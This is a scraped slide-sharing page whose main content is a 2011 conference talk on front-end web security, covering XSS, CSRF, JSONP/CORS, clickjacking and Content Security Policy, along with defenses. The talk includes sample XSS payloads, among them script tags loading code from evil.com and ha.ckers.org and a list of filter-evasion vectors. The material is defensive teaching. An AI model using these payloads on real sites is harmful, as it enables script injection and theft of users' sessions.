Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCzechDreamin
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...FIDO Alliance
 
Buy Epson EcoTank L3210 Colour Printer Online.pptx
Buy Epson EcoTank L3210 Colour Printer Online.pptxBuy Epson EcoTank L3210 Colour Printer Online.pptx
Buy Epson EcoTank L3210 Colour Printer Online.pptxEasyPrinterHelp
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfFIDO Alliance
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...FIDO Alliance
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераMark Opanasiuk
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Patrick Viafore
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeCzechDreamin
 
What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024Stephanie Beckett
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2DianaGray10
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomCzechDreamin
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?Mark Billinghurst
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsUXDXConf
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceSamy Fodil
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfFIDO Alliance
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKUXDXConf
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxJennifer Lim
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutesconfluent
 

Recently uploaded (20)

AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří Karpíšek
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Buy Epson EcoTank L3210 Colour Printer Online.pptx
Buy Epson EcoTank L3210 Colour Printer Online.pptxBuy Epson EcoTank L3210 Colour Printer Online.pptx
Buy Epson EcoTank L3210 Colour Printer Online.pptx
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджера
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering Teams
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAK
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 

Web Application Security in front end

  • 1. Web security in the frontend Framsia H2011 – Erlend Oftedal Side 1
  • 2.
  • 3.
  • 4. Who am I?  Developer  Head of the security competency group at BEKK  Chapter lead of the OWASP Norway chapter  Member of the Norwegian Honeynet project  erlend.oftedal@bekk.no  @webtonull  http://erlend.oftedal.no/blog
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 11. ?
  • 12. Client side validation of data sent to server  Improves usability  Has nothing to do with security Side 12
  • 13. Cross Site Scripting - XSS  One of the most common problems  OWASP Top 10 2004, 2007, 2010 Side 13 http://info.veracode.com/rs/veracode/images/soss-v3.pdf
  • 14. Cross site scripting Drawing by @johnwilander
  • 17. Stored Side 17Drawing by @johnwilander
  • 18. Stored Side 18Drawing by @johnwilander
  • 22. DOM-based Side 22  http://www.server.com/#banner=2011  Would you click:  http://server.com/#banner=2011<script src="http://evil.com/"></script>  http://server.com/#banner=2011%3Cscript%20src%3D%22http%3A//evil.com/%22%3E%3C/script% 3E  http://bit.ly/vH6d6w Not sent to server
  • 23. Example  $(location.hash)  $("#<script>alert(1)</script>")  http://codesearch.google.com/codesearch?as_q=%22%24%28location.hash%29%22 http://ma.la/jquery_xss/
  • 24. Twitter September 2010 (function(g) { var a = location.href.split("#!")[1]; if(a){ g.location = a; } })(window); Goal: https://twitter.com/#!/framsia https://twitter.com/framsia Side 24 http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
  • 25. Twitter September 2010 https://twitter.com/#!javascript:alert(1) g.location = "javascript:alert(1)" Side 25 Not sent to server
  • 26. First attempt to patch var c = location.href.split("#!")[1]; if(c) { window.location = c.replace(":", ""); } else { return true; } Side 26 Replaces first occurence of the search string.
  • 28. 2nd attempt (function(g){ var a = location.href.split("#!").[1]; if(a) { g.location = a.replace(/:/gi, ""); } })(window); Side 28
  • 30. Working patch (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location.pathname = a; } })(window); Side 30
  • 31. HTML5 - Browser Storage  Persistent DOM based XSS
  • 32. Is it really all that dangerous? Side 32
  • 35. How do we stop it? Side 35
  • 36. The same origin policy <script> <iframe src="http://mail.google.com"> </iframe>
  • 37. Is input validation enough?  How do you validate an email address?  [a-z]+@[a-z]+.[a-z]{2,3}  [a-z'-A-ZæøåÆØÅ.]+@[a-z0-9-.]+.[a-z]{2,3} Side 37
  • 38. From Wikipedia  The local-part of the email address may use any of these ASCII characters RFC 5322 Section 3.2.3: – Uppercase and lowercase English letters (a–z, A–Z) (ASCII: 65-90, 97-122) – Digits 0 to 9 (ASCII: 48-57) – Characters !#$%&'*+-/=?^_`{|}~ (ASCII: 33, 35-39, 42, 43, 45, 47, 61, 63, 94-96, 123-126) – Character . (dot, period, full stop) provided that it is not the first or last character, and provided also that it does not appear two or more times consecutively (e.g. John..Doe@example.com). – Special characters are allowed with restrictions including: – Space and "(),:;<>@[] (ASCII: 32, 34, 40, 41, 44, 58, 59, 60, 62, 64, 91-93)
  • 39. From Wikipedia  Valid email addresses – niceandsimple@example.com – a.little.unusual@example.com – much."more unusual"@example.com – very.unusual."@".unusual.com@example.com – very."(),:;<>[]".VERY."very @"very".unusual@cool.example.com
  • 40. Input validation is not enough!  How would you avoid XSS on Stack Overflow?  Do you really expect the user to write htmlentities like &gt; and &lt;? – User friendly? Side 40
  • 41. Contextual encoding  OWASP XSS Prevention cheat sheet – Between HTML tags – html encoding &#nn; – In HTML attributes – html attribute encoding &#nn; – In javascript strings – javascript encoding xnn – In CSS – CSS encoding nnnnnn – In URLs - URL encoding %nn Side 41
  • 42. Contextual encoding is important! Side 42 <html> <body> <script> var a = "</script><script>alert(1)</script>"; </script> </body> </html>
  • 43. Simple HTML encoding is not enough Side 43 <img class="profile" src="http://..." onmouseover="showUserProfile('bob&#39;); alert(&#39;1')">
  • 44. Allowing some HTML tags?  Use a well-tested whitelist based policy engine – Specify allowed tags and allowed attributes – Canonicalization  Suggestions – OWASP AntiSamy – HtmlPurifier Side 44
  • 45. Why you do NOT write your own HTML-cleaner/sanitizer <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> ¼script¾alert(¢XSS¢)¼/script¾ <charset="x-mac-farsi">☼script ☾alert(1)//☼/script ☾ http://ha.ckers.org/xss.html
  • 46. jQuery Encoder  $.encoder.canonicalize()  $.encoder.encodeForCSS()  $.encoder.encodeForHTML()  $.encoder.encodeForHTMLAttribute()  $.encoder.encodeForJavaScript()  $.encoder.encodeForURL()  http://github.com/chrisisbeef/jquery-encoder Side 46
  • 47. Avoiding DOM based XSS  Beware of potential attacker controlled data – window.name – window.referer – window.location.hash – ++ Side 47
  • 48. Coding principles  JSON from XHR should be JSON encoded – no HTML encoding  Beware of the semantics – jQuery:  Use $("...").text(value) instead of $("...").html(value)  Use .attr() to add attributes  Use .css() to modify CSS  URLencode before putting data in URLs (encodeURI() and friends)  Never ever put user data inside: – eval(string) – are you sure that's JSON and not just JS? – setInterval(string, t) – setTimeout(string, t) – new Function(string) Side 48
  • 49. Coding principles  If you are using a templating engine like Mustache, check: – When is data escaped? – How is it escaped? – For what? – Test it! Side 49
  • 51. CSRF Side 51  Cross Site Request Forgery  One-click attack, session riding
  • 52. Side 52 DEMO CSRF demo (GET + POST)
  • 53. CSRF - Overview Side 53 1. Login 2. Load content 4. Pay bill to attacker’s account Infected server 3. Page with hidden script Bank
  • 54. Stopping CSRF Side 54  Explicit verification before performing an action – CAPTCHA – Re-authentication  One-time password before paying bills
  • 55. CSRF – Token Side 55 1. GET /pay Infected server Bank 2. 200 OK - <form...><input name="token" value="x123LKJ23" 3. POST /pay – token=x123LKJ23 4. 200 OK For session x Token=x123LKJ23 x123LKJ23 == x123LKJ23
  • 56. CSRF – Bad token Side 56 0. Login 1. Load content Infected server 2. Page with hidden script and form <form...><input name="token" value="XYZZ..." > Bank 3. POST /pay – token=XYZZ... 4. 400 Bad request For session x Token=9992812jabc 9992812jabc != XYZZ...
  • 57. Side 57 DEMO CSRF Token protection demo
  • 58. Cross Domain Data Side 58  Proxy  JSONP  CORS
  • 59. Proxy Side 59  Client asks server  Server asks target  Target returns data to server  Server returns data to client  Allows server to inspect/reject data  Does not circumvent the Same Origin Policy  Cannot directly reuse current authentication
  • 60. JSONP Side 60  Page from server A adds a script-tag to target server B  Server B (hopefully) returns JSON data wrapped in a callback function: callback({"id":0, ...})  Page from server A defines a function with the same name as the callback function, and receives the data  Can leverage current authentication  Any webpage can include the same script tag and the same callback and thus potentially steal the data  Server B can misbehave and send other types of javascript (XSS)  No easy way to protect POST requests from CSRF  => Insecurely circumventing the Same Origin Policy
  • 61. CORS – Cross Origin Resource Sharing Side 61  Standards-defined secure way to do cross domain requests from the browser  Types: – postMessage – Cross Domain XHR
  • 62. CORS - postMessage Side 62  Webpage from server A includes a (hidden) iframe to target server B  JavaScript on page from A, invokes postMessage on iframe iframe.contentWindow .postMessage("some data", "http://serverB")  Page in iframe from server B defines an event handler: $(window).bind("message", function(e) { var event = e.originalEvent; if (event.origin == "http://serverA") { //process event.data } });
  • 63. CORS - postMessage Side 63  Remember to check origin of an event  Don't be tempted to specify "*" as the second parameter to postMessage
  • 64. Cross Domain XHR Side 64  $.getJSON("http://serverB/someService", function(data) { //handle data });  Server B returns the data with a specific response header: Access-Control-Allow-Origin: http://serverA  Once again do not use * as server name unless you want the data to be available to server
  • 65. Side 65 DEMO CORS DEMO (XHR + postMessage)
  • 66. Important regardless of choice Side 66  Agree on type of encodig – prefer JSON with no other encoding  Remember – if you allow HTML, you open for XSS
  • 67. Side 67 DEMO Video of XSS via twitter feed
  • 68. Clickjacking Side 68  User does not click on what he/she thinks  Hidden iframe  Like-jacking
  • 71. Advanced clickjacking Side 71  Exploiting drag-n-drop to steal content  User drags a ball into a basket – In reality selects text and drops it in a textarea
  • 72. Anti-clickjacking Side 72  Javascript framebusting  Response header X-Frame-Options: sameorigin X-Frame-Options: deny  Javascript framebusting can be circumvented  X-Frame-Options is only supported in newer browsers – IE8 was the first one – IE also supports X-Frame-Options: allow-from <domains>
  • 74. EcmaScript 5 – defineProperty Side 74  Object.defineProperty(object, propertyName, { get: function() { ... }, set: function(value) { ... }, configurable: boolean })
  • 75. Side 75 DEMO Blocking calls to document.cookie from JS
  • 76. HTML5 – SVG http://www.owasp.org/images/a/aa/The_image_that_called_me.pdf  Scalable Vector Graphics – Image format – Allows for scripting – XML-based – Can be declared inline – <html>...<div>...<svg>...  Countless XSS bugs in browser implementations
  • 77. SVG favicon  SVG favicon overlaying the chrome of Opera Side 77 Picture by Mario Heiderich @0x6D6172696F
  • 78. Content Security Policy Mozilla CSP - Content Security Policy • Now a W3C standard • header based - server instructs browser • policies for javascript, frames, images, style etc. X-Content-Security-Policy: allow *; script-src 'self‘ X-Content-Security-Policy: allow *; script-src 'self' *.google.com https://*.nordea.no:443 X-Content-Security-Policy: allow *; script-src 'self'; options inline-script eval-script https://wiki.mozilla.org/Security/CSP/Spec
  • 79. Content Security Policy  First version came in Firefox 4 – FF7 and FF8beta ~80% compliant with current W3C spec  Implemented in Chrome – Completely broken in Chrome 15 – ~95% compliant in beta (16)  By default disables javascript functions that build code from strings eval(s), setTimeout(s,t), setInterval(s,t), new Function(s)  Can (in the future) be used for clickjacking-defence: frame-ancestors uri Side 79
  • 81. Other HTML5 features Side 81  Check html5sec.org  Test tool http://html5sec.org/innerhtml
  • 83. Questions Erlend Oftedal erlend.oftedal@bekk.no @webtonull  People you should follow @0x6D6172696F – HTML5 security @johnwilander – RIA security @wisecwisec – DOM based XSS @garethheyes - XSS @kkotowicz - Clickjacking

Editor's Notes

  1. simple firebug/tamperdata bypass
  2. Reflected XSS – search field on www.insecurelabs.org
  3. Stored XSS - qwitter
  4. DOM-based XSS – qwitter – searchfield
  5. BEEF
  6. DOMinator
  7. CSRF Token protection
  8. CORS
  9. Not twitter&apos;s fault
  10. Anti clickajacking